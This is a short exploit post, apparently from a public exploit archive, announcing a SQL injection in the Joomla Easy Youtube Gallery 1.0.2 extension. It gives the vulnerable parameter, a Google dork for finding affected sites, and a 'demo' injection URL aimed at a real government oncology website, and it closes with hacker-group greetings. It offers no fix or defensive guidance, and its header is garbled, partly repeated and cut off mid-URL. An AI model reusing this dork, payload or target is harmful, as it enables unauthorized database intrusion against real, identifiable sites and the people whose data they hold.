Joomla Easy Youtube Gallery 1.0.2 SQL Injection

######################
# Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.jooml ######################
# Exploit Title : Joomla Easy Youtube Gallery 1.0.2 SQL Injection Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/easy-youtube-gallery
# Google Dork : inurl:com_easy_youtube_gallery mycategory
# Date: 2016/03/22
# Version: 1.0.2
######################
# PoC:
# mycategory=[SQL]
#
# Demo:
# http://www.onkoloji.gov.tr/index.php?option=com_easy_youtube_gallery&view=videos&mycategory=0%27&defaultvideo=9&Itemid=752
#
######################
# Discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
# Homepage : persian-team.ir
# Greetz : Milad_Hacking & FireKernel And You
######################
Leave a comment